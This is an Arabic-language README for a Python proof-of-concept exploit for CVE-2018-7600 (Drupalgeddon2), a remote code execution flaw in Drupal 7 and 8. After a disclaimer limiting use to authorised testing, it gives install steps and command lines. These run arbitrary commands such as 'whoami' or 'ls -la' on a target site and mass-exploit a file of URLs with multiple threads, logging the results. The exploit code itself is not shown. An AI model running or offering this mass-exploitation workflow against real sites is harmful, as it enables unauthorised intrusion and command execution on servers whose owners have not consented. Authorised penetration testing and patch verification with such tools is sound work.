
يحتوي هذا المستودع على إثبات مفهوم (PoC) أصلي ومطور ذاتيًا بالكامل لـ CVE-2018-7600، والمعروف أيضًا باسم Drupalgeddon 2 — وهي ثغرة أمنية حرجة لتنفيذ الأكواد عن بُعد تؤثر على إصدارات Drupal 7 و 8 الأساسية.
يحتوي هذا المستودع على برهان مفهوم بلغة بايثون لاستغلال ثغرة تنفيذ الأوامر عن بُعد الحرجة في دروبال، والمعروفة باسم Drupalgeddon2 (CVE-2018-7600). صُمم هذا السكريبت للأغراض التعليمية وللمتخصصين في الأمن لاستخدامه في سيناريوهات اختبار الاختراق المصرح بها.
هذه الأداة مخصصة للأغراض القانونية والأخلاقية فقط. استخدام هذا السكريبت على أي نظام دون إذن صريح من المالك يعتبر غير قانوني. المؤلف والمساهمون غير مسؤولين عن أي استخدام خاطئ أو ضرر ناتج عن هذا السكريبت. استخدمه على مسؤوليتك الخاصة.
requestscoloramagit clone <repository-url>
cd <repository-directory>
pip install -r requirements.txt
pip install requests colorama
يقدم السكريبت عدة وسائط لسطر الأوامر لتخصيص تنفيذه.
استغلال هدف واحد بالأمر الافتراضي (whoami):
python3 drupalgeddon2.py -t http://example.com
استغلال هدف واحد بأمر مخصص (مثل ls -la):
python3 drupalgeddon2.py -t http://vulnerable-drupal.site -c "ls -la"
مسح قائمة أهداف من ملف:
إنشاء ملف باسم targets.txt يحتوي على عنوان URL واحد في كل سطر:
http://site1.com
https://site2.org
http://site3.net
ثم تشغيل السكريبت:
python3 drupalgeddon2.py -l targets.txt
مسح قائمة بأمر مخصص وزيادة عدد الخيوط:
python3 drupalgeddon2.py -l targets.txt -c "uname -a" -T 10
حفظ المخرجات في ملف سجل:
python3 drupalgeddon2.py -l targets.txt -o scan_results.log
| الوسيطة | الاختصار | الوصف | القيمة الافتراضية |
|---|---|---|---|
--target | -t | عنوان URL واحد للهدف. | - |
--list | -l | مسار ملف يحتوي على قائمة عناوين URL للأهداف. | - |
--command | -c | الأمر المراد تنفيذه على الهدف. | whoami |
--threads | -T | عدد الخيوط المتزامنة المستخدمة. | 5 |
--output | -o | ملف لتسجيل المخرجات فيه. | - |
--timeout | مهلة الطلب بالثواني. | 15 |